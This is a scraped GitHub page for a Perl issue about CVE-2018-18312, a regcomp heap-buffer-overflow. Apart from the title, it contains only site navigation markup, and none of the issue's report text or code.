
[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) · Issue #16649 · Perl/perl5 · GitHub

1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path> </svg> <div> <div class="color-fg-default h4">GitHub Copilot</div> Write better code with AI </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;github_advanced_security&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;github_advanced_security_link_product_navbar&quot;}" href="https://github.com/security/advanced-security"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path> </svg> <div> <div class="color-fg-default h4">GitHub Advanced Security</div> Find and fix vulnerabilities </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;actions&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;actions_link_product_navbar&quot;}" href="https://github.com/features/actions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" 
width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path> </svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;codespaces&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;codespaces_link_product_navbar&quot;}" href="https://github.com/features/codespaces"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path> </svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> </a></li> <li> <a 
class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;issues&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;issues_link_product_navbar&quot;}" href="https://github.com/features/issues"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path> </svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;code_review&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;code_review_link_product_navbar&quot;}" href="https://github.com/features/code-review"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 
0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Review</div> Manage code changes </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;discussions&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;discussions_link_product_navbar&quot;}" href="https://github.com/features/discussions"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" 
data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;code_search&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;code_search_link_product_navbar&quot;}" href="https://github.com/features/code-search"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-square color-fg-subtle mr-3"> <path d="M10.3 8.24a.75.75 0 0 1-.04 1.06L7.352 12l2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M2 3.75C2 2.784 2.784 2 3.75 2h16.5c.966 0 1.75.784 1.75 1.75v16.5A1.75 1.75 0 0 1 20.25 22H3.75A1.75 1.75 0 0 1 2 20.25Zm1.75-.25a.25.25 0 0 0-.25.25v16.5c0 .138.112.25.25.25h16.5a.25.25 0 0 0 .25-.25V3.75a.25.25 0 0 0-.25-.25Z"></path> </svg> <div> <div class="color-fg-default h4">Code Search</div> Find more, search less </div> </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="product-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="product-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;all_features&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;all_features_link_product_navbar&quot;}" href="https://github.com/features"> All features </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" 
data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;documentation&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;documentation_link_product_navbar&quot;}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;github_skills&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;github_skills_link_product_navbar&quot;}" href="https://skills.github.com"> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link 
d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;blog&quot;,&quot;context&quot;:&quot;product&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;blog_link_product_navbar&quot;}" href="https://github.blog"> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 
mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 pb-lg-3 mb-3 mb-lg-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-company-size-heading">By company size</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-company-size-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;enterprises&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;enterprises_link_solutions_navbar&quot;}" href="https://github.com/enterprise"> Enterprises </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;small_and_medium_teams&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;small_and_medium_teams_link_solutions_navbar&quot;}" href="https://github.com/team"> Small and medium teams </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;startups&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;startups_link_solutions_navbar&quot;}" href="https://github.com/enterprise/startups"> Startups </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;nonprofits&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;nonprofits_link_solutions_navbar&quot;}" href="/solutions/industry/nonprofits"> Nonprofits </a></li> </ul> </div> <div class="border-bottom pb-3 
pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="solutions-by-use-case-heading">By use case</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-use-case-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;devsecops&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;devsecops_link_solutions_navbar&quot;}" href="/solutions/use-case/devsecops"> DevSecOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;devops&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;devops_link_solutions_navbar&quot;}" href="/solutions/use-case/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;ci_cd&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;ci_cd_link_solutions_navbar&quot;}" href="/solutions/use-case/ci-cd"> CI/CD </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;view_all_use_cases&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;view_all_use_cases_link_solutions_navbar&quot;}" href="/solutions/use-case"> View all use cases </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 color-fg-default my-1" 
id="solutions-by-industry-heading">By industry</span> <ul class="list-style-none f5" aria-labelledby="solutions-by-industry-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;healthcare&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;healthcare_link_solutions_navbar&quot;}" href="/solutions/industry/healthcare"> Healthcare </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;financial_services&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;financial_services_link_solutions_navbar&quot;}" href="/solutions/industry/financial-services"> Financial services </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;manufacturing&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;manufacturing_link_solutions_navbar&quot;}" href="/solutions/industry/manufacturing"> Manufacturing </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;government&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;government_link_solutions_navbar&quot;}" href="/solutions/industry/government"> Government </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" 
data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;view_all_industries&quot;,&quot;context&quot;:&quot;solutions&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;view_all_industries_link_solutions_navbar&quot;}" href="/solutions/industry"> View all industries </a></li> </ul> </div> </div> <div class="HeaderMenu-trailing-link rounded-bottom-2 flex-shrink-0 mt-lg-4 px-lg-4 py-4 py-lg-3 f5 text-semibold"> <a href="/solutions"> View all solutions <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-right HeaderMenu-trailing-link-icon"> <path d="M6.22 3.22a.75.75 0 0 1 1.06 0l4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L9.94 8 6.22 4.28a.75.75 0 0 1 0-1.06Z"></path> </svg> </a> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Resources <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 d-lg-flex flex-wrap dropdown-menu-wide"> <div class="HeaderMenu-column px-lg-4 border-lg-right mb-4 mb-lg-0 pr-lg-7"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0"> <span class="d-block h4 
color-fg-default my-1" id="resources-topics-heading">Topics</span> <ul class="list-style-none f5" aria-labelledby="resources-topics-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;ai&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;ai_link_resources_navbar&quot;}" href="/resources/articles/ai"> AI </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;devops&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;devops_link_resources_navbar&quot;}" href="/resources/articles/devops"> DevOps </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;security&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;security_link_resources_navbar&quot;}" href="/resources/articles/security"> Security </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;software_development&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;software_development_link_resources_navbar&quot;}" href="/resources/articles/software-development"> Software Development </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" 
data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;view_all&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;view_all_link_resources_navbar&quot;}" href="/resources/articles"> View all </a></li> </ul> </div> </div> <div class="HeaderMenu-column px-lg-4"> <div class="border-bottom pb-3 pb-lg-0 border-lg-bottom-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="resources-explore-heading">Explore</span> <ul class="list-style-none f5" aria-labelledby="resources-explore-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;learning_pathways&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;learning_pathways_link_resources_navbar&quot;}" href="https://resources.github.com/learn/pathways"> Learning Pathways <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" 
data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;events_amp_webinars&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;events_amp_webinars_link_resources_navbar&quot;}" href="https://resources.github.com"> Events &amp; Webinars <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path> </svg> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;ebooks_amp_whitepapers&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;ebooks_amp_whitepapers_link_resources_navbar&quot;}" href="https://github.com/resources/whitepapers"> Ebooks &amp; Whitepapers </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;location&quot;:&quot;navbar&quot;,&quot;action&quot;:&quot;customer_stories&quot;,&quot;context&quot;:&quot;resources&quot;,&quot;tag&quot;:&quot;link&quot;,&quot;label&quot;:&quot;customer_stories_link_resources_navbar&quot;}" href="https://github.com/customer-stories"> Customer Stories </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary Link--external" target="_blank" 
